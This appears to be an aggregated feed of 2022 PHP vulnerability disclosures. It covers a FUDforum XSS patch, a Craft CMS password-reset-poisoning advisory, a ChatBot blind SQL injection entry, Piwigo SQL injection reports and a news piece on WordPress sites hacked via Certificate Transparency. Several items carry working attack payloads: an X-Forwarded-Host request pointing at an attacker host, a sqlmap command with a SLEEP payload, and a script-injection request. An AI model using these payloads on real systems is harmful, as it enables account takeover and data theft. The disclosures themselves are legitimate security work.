FUDforum 3.1.1 is vulnerable to Stored XSS.

@@ -1,6 +1,6 @@ <?php /\*\* \* copyright : (C) 2001-2021 Advanced Internet Designs Inc. \* copyright : (C) 2001-2022 Advanced Internet Designs Inc. \* email : forum@prohost.org \* $Id$ \* @@ -38,6 +38,13 @@ function validate\_email($email)  
function encode\_subject($text) { /\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
$text = htmlspecialchars($text); // Prevent XSS like <img src="1" onerror="alert()"\>  
if (preg\_match('!\[\\x7f-\\xff\]!', $text)) { $text = '\=?{TEMPLATE: iemail\_CHARSET}?B?'. base64\_encode($text) .'?='; } @@ -51,11 +58,6 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) return 0; }  
/\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
if ($header) { $header = "\\n" . str\_replace("\\r", '', $header); } @@ -66,11 +68,11 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) $addronly = preg\_replace('/.\*</', '<', $from); // RFC 2822 Return-Path: <...> $header = 'From: '. $from ."\\nReturn-Path: ". $addronly ."\\nUser-Agent: FUDforum/". $GLOBALS\['FORUM\_VERSION'\] . $extra\_header . $header;  
$subj = encode\_subject($subj); $body = str\_replace("\\r", '', $body); if ($munge\_newlines) { $body = str\_replace('\\n', "\\n", $body); } $subj = encode\_subject($subj);  
// Call PRE mail plugins. if (defined('plugins')) { @@ -90,7 +92,7 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) } $smtp = new fud\_smtp; $smtp\->msg = str\_replace(array('\\n', "\\n."), array("\\n", "\\n.."), $body); $smtp\->subject = encode\_subject($subj); $smtp\->subject = $subj; $smtp\->to = $to; $smtp\->from = $from; $smtp\->headers = $header;

CVE-2022-28545: Fix XSS vulnerability reported by ptsecurity.com (attacker tries to s… · fudforum/FUDforum@aed6966

Stored Cross-Site Scripting (XSS) vulnerability in Andrea Pernici News Sitemap for Google plugin <= 1.0.16 on WordPress, attackers must have contributor or higher user role.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 6, 2022 and is not available for download. This closure is temporary, pending a full review.

Hi, great plugin! Can you correct these warnings? Notice: Use of undefined constant WP\_Error - assumed 'WP\_Error' in /home/brusco/workspace/icon/wp-content/plugins/google-news-sitemap/apgnsm.php on line 174 Notice: Undefined variable: apgnsm\_active in /home/brusco/workspace/icon/wp-content/plugins/google-news-sitemap/apgnsm.php on line 184

Il plugin fa esattamente quello che promette, e lo fa in modo semplice e pulito. il solo "difetto" l'accesso alla configurazione anche agli autori e collaboratori

Read all 4 reviews

“Andrea Pernici News Sitemap for Google” is open source software. The following people have contributed to this plugin.

Contributors

*    Andrea Pernici

CVE-2021-36912: Andrea Pernici News Sitemap for Google

Craft CMS version 3.7.36 suffers from a password reset poisoning vulnerability. An unauthenticated attacker who knows valid email addresses or account names of Craft CMS backend users is able to manipulate the password reset functionality in a way that the registered users of the CMS receive password reset emails containing a malicious password reset link.

SEC Consult Vulnerability Lab Security Advisory < 20220505-0 >  
=======================================================================  
               title: Password Reset Poisoning Attack  
             product: Craft CMS  
  vulnerable version: 3.7.36 and potentially lower  
       fixed version: none, see workaround by vendor  
          CVE number: CVE-2022-29933  
              impact: high  
            homepage: https://craftcms.com  
               found: 2022-03-14  
                  by: Sandro Einfeldt (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Craft is a flexible, user-friendly CMS for creating custom digital  
experiences on the web and beyond.

It features:

- An intuitive, user-friendly control panel for content creation and  
   administrative tasks.  
- A clean-slate approach to content modeling and front-end development  
   that doesn’t make any assumptions about your content or how it should be  
   consumed.  
- A built-in Plugin Store with hundreds of free and commercial plugins,  
   all just a click away.  
- A robust framework for module and plugin development.  
- An active, vibrant community."

Source: https://craftcms.com/docs/3.x/

Business recommendation:  
------------------------  
The vendor responded that the vulnerability will not be fixed as a workaround  
is available.

An in-depth security analysis performed by security professionals is highly  
advised, as the software may be affected from further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Password Reset Poisoning Attack (CVE-2022-29933)  
The password reset function of the Craft CMS backend login page,  
usually accessible under https://<hostname>/index.php?p=admin/login,  
is vulnerable to a password reset poisoning attack. An unauthenticated  
attacker who knows valid email addresses or account names of Craft CMS  
backend users is able to manipulate the password reset functionality in  
a way that the registered users of the CMS receive password reset emails  
containing a malicious password reset link.

The link contains valid (secret) tokens in the URL's GET parameters that  
are necessary to authenticate against the server's password reset function  
and enable a user who lost or forgot the account's password to reset the  
password. By manipulating the password reset request, an attacker is able to  
set an arbitrary hostname in the resulting password reset link. Thereby, the  
attacker can set the link to point to an attacker-controlled host.  
If a user clicks on the reset link, the valid reset tokens in the GET  
parameters will be sent to the attacker's web server and can be  
extracted from the server logs. The attacker is able to build a valid  
password reset link by adding the tokens to the general reset link  
structure:

https://<hostname>/index.php?p=admin/set-password&code=<token1>&id=<token2>

If the attacker calls the filled out URL with a web browser, the  
attacker will be able to reset the account's password and log in.

Proof of concept:  
-----------------  
1) Password Reset Poisoning Attack (CVE-2022-29933)  
First, the attacker needs to browse the following URL:

https://<hostname>/index.php?p=admin/login

The login mask contains a link "Forgot your password?". Following this  
link, the attacker gets prompted to submit a valid account name or email  
address. After entering the account name or email address and pressing  
the "Reset Password" button, the attacker can intercept the resulting  
HTTP POST request with an intercepting web proxy (e.g. BurpSuite). The  
intercepted request can then be manipulated before getting forwarded  
to the server. The attacker needs to add the HTTP header

X-Forwarded-Host: <attacker_host>

while the value should contain the hostname of the webserver under the  
attacker's control.

Manipulated Request:  
-------------------------------------------------------------------------------  
POST /index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1  
Host: <IP>  
X-Forwarded-Host: www.attacker.com  
[...]  
Referer: http://<IP>/index.php?p=admin/login  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Registered-Asset-Bundles: ,craft\web\assets\login\[...]  
X-Registered-Js-Files: ,http://<IP>/cpresources/[...]  
X-CSRF-Token: c9kEDPROifmFNKSKhght_JgkBgnnk5EfXiH1qHA[...]  
X-Requested-With: XMLHttpRequest  
Content-Length: 38  
Origin: http://<IP>  
Connection: close  
Cookie: CRAFT_CSRF_TOKEN=[...]

loginName=test%40example.com  
-------------------------------------------------------------------------------

The resulting server response indicates that the request has been processed.

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Mon, 14 Mar 2022 08:19:24 GMT  
[...]  
X-Powered-By: Craft CMS  
Content-Length: 16  
Connection: close  
Content-Type: application/json; charset=UTF-8

{"success":true}  
-------------------------------------------------------------------------------

The user will then receive a malicious password reset email pointing to the  
hostname that the attacker provided by adding the X-Forwarded-Host header.

Email:  
-------------------------------------------------------------------------------  
Hey Test,

To reset your Test Install password, click on this link:

http://www.attacker.com/index.php?p=admin/set-password&code=D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u&id=48b9fe48-91c9-430e-baa2-5bdf66c88102

If you were not expecting this email, just ignore it.  
-------------------------------------------------------------------------------

If the user is not aware and clicks on the link, the values of the reset tokens  
"code" and "id" will be sent to the attacker's web server. The attacker is  
then able to relay the tokens to the original reset endpoint and reset the  
password.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* 3.7.36

Vendor contact timeline:  
------------------------  
2022-03-10: Contacting vendor through contact form.  
2022-03-14: Vendor provides Craft CMS installation for verifying the vulnerability.  
2022-03-22: SEC Consult provides the vulnerability advisory through contact form.  
2022-03-23: Vendor responded that there is a hardening measure available.  
2022-03-31: SEC Consult replied that all installations of the current version  
             (including the testing instance provided by the vendor) are vulnerable  
             by default and the vulnerability is implementation-based and results  
             from bad coding practices.  
Until 2022-05-02: No answer from vendor.  
2022-05-03: Set advisory release date to 5th May. Informing vendor about  
             scheduled advisory release.  
2022-05-05: Release of security advisory.

Solution:  
---------  
The vendor knows about the vulnerability and the resulting risks. A possible  
hardening measure has to be implemented manually and is documented here:  
https://craftcms.com/knowledge-base/securing-craft#explicitly-set-the-web-alias-for-the-site  
https://craftcms.com/docs/3.x/sites.html#site-url

The vendor responded that the vulnerability will not be fixed as a workaround  
is available.

Workaround:  
-----------  
The backend login interface and the password reset function should not be  
accessible from the internet or from any unknown IP addresses. The user  
must implement the workaround described in the hardening guide above in order  
to mitigate this issue.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Einfeldt / @2022

Craft CMS 3.7.36 Password Reset Poisoning Attack

ChatBot Application with a Suggestion Feature version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection# Date: 05/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 4 in file "/simple_chat_bot/admin/responses/view_response.php"$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");# Sqlmap command:sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response

ChatBot Application With A Suggestion Feature 1.0 SQL Injection

SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.

POST /admin.php?page=group\_list HTTP/1.1  
Host: 10.150.10.186:30001  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://10.150.10.186:30001/admin.php?page=group\_list  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 430  
Cookie: pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_id=hb609s43hqj1iqrkvlrvgne5q7  
Connection: close  
Upgrade-Insecure-Requests: 1

pwg\_token=036e74fc33b5eee65c74f44b98c09e13&group\_selection%5B%5D=1&selectAction=delete&rename\_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm\_deletion=1&duplicate\_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C

CVE-2020-19212: SQL injection in group_list.php · Issue #1009 · Piwigo/Piwigo

SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories.

    POST /admin.php?page=cat_move HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=cat_move
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 108
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    selection%5B%5D=4&parent=7&submit=%E6%8F%90%E4%BA%A4

CVE-2020-19213: SQL injection in cat_move.php · Issue #1010 · Piwigo/Piwigo

SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.

    POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 33
    Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=11&trueify=%C2%AB
    

    POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 86
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=1&trueify=%C2%AB

CVE-2020-19215: SQL injection in user/group permissions manager · Issue #1011 · Piwigo/Piwigo

SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.

hi，There is a vulnerability in the admin/batch\_manager.php.  

I didn't find the full trigger request in the browser, so I added the ‘&filter\_category\_use=on’ parameter to the request based on the code.

    POST /admin.php?page=batch_manager HTTP/1.1
    Host: 10.150.10.186:30002
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 695
    Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate
    s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&
    filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat
    io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma
    x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=
    0&regenerateSuccess=0&regenerateError=0

CVE-2020-19217: SQL injection in admin/batch_manager.php · Issue #1012 · Piwigo/Piwigo

Attackers pounce before site owners can activate the installation wizard

Attackers pounce before site owners can activate the installation wizard

Attackers are abusing the Certificate Transparency (CT) system to compromise new WordPress sites in the typically brief window of time before the content management system (CMS) has been configured and therefore secured.

CT is a web security standard for monitoring and auditing TLS (aka SSL) certificates, which are issued by certificate authorities (CAs) to validate websites’ identity.

First implemented by the DigiCert CA in 2013, the standard mandates that CAs immediately record all newly issued certificates on public logs in the interests of transparency and the prompt discovery of rogue or misused certificates.

**DDoS attacks**

However, evidence is growing that malicious hackers are monitoring these logs in order to detect new WordPress domains and configure the CMS themselves after web admins upload the WordPress files, but before they manage to secure the website with a password.

Multiple testimonies have emerged detailing sites being hacked within minutes – within seconds, even – of TLS certificates being requested.

RELATED ‘Dangerous’ EU web authentication plan threatens to undercut browser-led certification system

Domain owners report the appearance of a malicious file (/wp-includes/.query.php) and sites being press-ganged into joining DDoS attacks.

On a related thread on the support forum of Let’s Encrypt, a CA that issues free certificates and launched its own CT log in 2019, a Certbot engineer said the attacks had “been happening for a few years now”.

**Recon techniques**

Josh Aas, executive director at the Internet Security Research Group, which runs Let’s Encrypt, agrees with the engineer’s speculation over the attackers’ reconnaissance techniques.

“If the attacker is polling CT logs directly they would see new certificate entries faster, giving them a larger time window in which to pull off the attack,” Aas told The Daily Swig. Scanning crt.sh, a certificate search domain, “might also work, but it takes longer for new certificates to propagate from CT”.

There’s no question of the attacks reflecting shortcomings in the CT system, which according to Let’s Encrypt has “led to numerous improvements to the CA ecosystem and web security” and “is rapidly becoming critical infrastructure”.

Aas said all publicly trusted CAs are required to submit certificates to CT logs “without delay after they are issued”.

**An argument for automation**

He suggested that the responsibility for protecting new WordPress sites ultimately lies with domain owners and hosting providers.

“Getting a certificate from Let’s Encrypt may make it easier to detect a new installation, but nobody should be putting WordPress installations on the public internet until they are secured. If a hosting provider or any other entity is doing that, please report it as a vulnerability in their deployment process.”

Catch up on the latest WordPress security news

Josepha Haden, executive director on the WordPress project at Automattic, told The Daily Swig that the attacks “only affects direct installations – if a site is on any recommended host, or the installation process is automated, there is usually a pre-configured config file so the installation process is complete/is not interactive and there’s little chance for that attack”.

In a recent blog post on the topic, Colorado-based web design firm White Fir Design suggested that WordPress could tackle the problem by giving the domain owner “control of the website” at the outset, “say, by adding a \[template\] file”.

On the Let’s Encrypt forum, Christopher Cook, developer of Let's Encrypt Windows UI Certify the Web, proposed that WordPress “could randomise the install URL and present it only to you in the console, or require a one-time token”.

Josepha Haden acknowledged that WordPress needed “to review the issue. The Core team is aware and discussing the best changes as well as best timing as we move forward with the rest of our releases for the remainder of the year,” she said.

RECOMMENDED Heroku resets user passwords after concluding April cyber-attack ran deep

WordPress sites getting hacked ‘within seconds’ of TLS certificates being issued

Foxit PDF Reader v11.2.1.53537 was discovered to contain a NULL pointer dereference via the component FoxitPDFReader.exe. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PHP file.

Tag

#php